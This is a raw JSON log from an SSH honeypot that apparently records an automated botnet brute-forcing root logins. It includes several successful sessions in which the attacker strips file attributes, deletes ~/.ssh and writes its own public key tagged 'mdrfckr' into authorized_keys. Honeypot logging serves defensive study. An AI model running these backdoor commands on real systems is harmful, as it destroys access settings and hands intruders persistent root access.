{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48218,"dst_ip":"1.2.3.4","dst_port":22,"session":"40b52445f97d","protocol":"ssh","message":"New connection: 212.227.235.229:48218 (1.2.3.4:22) [session: 40b52445f97d]","sensor":"my-vps","timestamp":"2025-08-31T05:58:01.220341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:01.222550Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:01.478650Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.login.success","username":"root","password":"now.cn123","message":"login attempt [root/now.cn123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:02.509414Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:03.478294Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:03.479043Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:03.479893Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":39292,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67d38a2d64c","protocol":"ssh","message":"New connection: 43.159.36.188:39292 (1.2.3.4:22) [session: f67d38a2d64c]","sensor":"my-vps","timestamp":"2025-08-31T05:58:03.647980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:03.649233Z","src_ip":"43.159.36.188","session":"f67d38a2d64c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:03.738719Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:03.892661Z","src_ip":"43.159.36.188","session":"f67d38a2d64c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48561,"dst_ip":"1.2.3.4","dst_port":22,"session":"36eaca8bdd17","protocol":"ssh","message":"New connection: 212.227.235.229:48561 (1.2.3.4:22) [session: 36eaca8bdd17]","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.094596Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:04.275489Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.276349Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.535964Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.537028Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49388,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff0f0d581f8a","protocol":"ssh","message":"New connection: 212.227.235.229:49388 (1.2.3.4:22) [session: ff0f0d581f8a]","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.792056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.792858Z","src_ip":"212.227.235.229","session":"ff0f0d581f8a"}
{"eventid":"cowrie.login.failed","username":"khalid","password":"khalid","message":"login attempt [khalid/khalid] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:04.869075Z","src_ip":"43.159.36.188","session":"f67d38a2d64c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.051515Z","src_ip":"212.227.235.229","session":"ff0f0d581f8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44612,"dst_ip":"1.2.3.4","dst_port":22,"session":"13fc7a59f59b","protocol":"ssh","message":"New connection: 212.227.235.229:44612 (1.2.3.4:22) [session: 13fc7a59f59b]","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.320013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.321209Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.609470Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.session.closed","duration":"65.7","message":"Connection lost after 65.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.652947Z","src_ip":"212.227.125.160","session":"6bcb4f6be927"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.671229Z","src_ip":"212.227.235.229","session":"36eaca8bdd17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:05.833611Z","src_ip":"212.227.235.229","session":"36eaca8bdd17"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:06.115611Z","src_ip":"43.159.36.188","session":"f67d38a2d64c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:06.121576Z","src_ip":"212.227.235.229","session":"ff0f0d581f8a"}
{"eventid":"cowrie.login.success","username":"root","password":"Zz12345678","message":"login attempt [root/Zz12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:06.802731Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:07.398995Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.399694Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.400793Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.403279Z","src_ip":"212.227.235.229","session":"ff0f0d581f8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50470,"dst_ip":"1.2.3.4","dst_port":22,"session":"281f085138bd","protocol":"ssh","message":"New connection: 212.227.235.229:50470 (1.2.3.4:22) [session: 281f085138bd]","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.636334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.640492Z","src_ip":"212.227.235.229","session":"281f085138bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.690213Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:07.895679Z","src_ip":"212.227.235.229","session":"281f085138bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:08.324903Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:58:08.325559Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:58:08.615659Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:08.616607Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46246,"dst_ip":"1.2.3.4","dst_port":22,"session":"916af26a5179","protocol":"ssh","message":"New connection: 212.227.235.229:46246 (1.2.3.4:22) [session: 916af26a5179]","sensor":"my-vps","timestamp":"2025-08-31T05:58:08.898902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:08.899761Z","src_ip":"212.227.235.229","session":"916af26a5179"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:08.920502Z","src_ip":"212.227.235.229","session":"281f085138bd"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:09.178869Z","src_ip":"212.227.235.229","session":"40b52445f97d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:09.179772Z","src_ip":"212.227.235.229","session":"281f085138bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:09.184699Z","src_ip":"212.227.235.229","session":"916af26a5179"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:10.368005Z","src_ip":"212.227.235.229","session":"916af26a5179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39634,"dst_ip":"1.2.3.4","dst_port":22,"session":"446b9cf0ba24","protocol":"ssh","message":"New connection: 212.227.125.160:39634 (1.2.3.4:22) [session: 446b9cf0ba24]","sensor":"my-vps","timestamp":"2025-08-31T05:58:10.868637Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:11.655057Z","src_ip":"212.227.235.229","session":"916af26a5179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47326,"dst_ip":"1.2.3.4","dst_port":22,"session":"38abad80ed63","protocol":"ssh","message":"New connection: 212.227.235.229:47326 (1.2.3.4:22) [session: 38abad80ed63]","sensor":"my-vps","timestamp":"2025-08-31T05:58:11.942003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:11.944056Z","src_ip":"212.227.235.229","session":"38abad80ed63"}
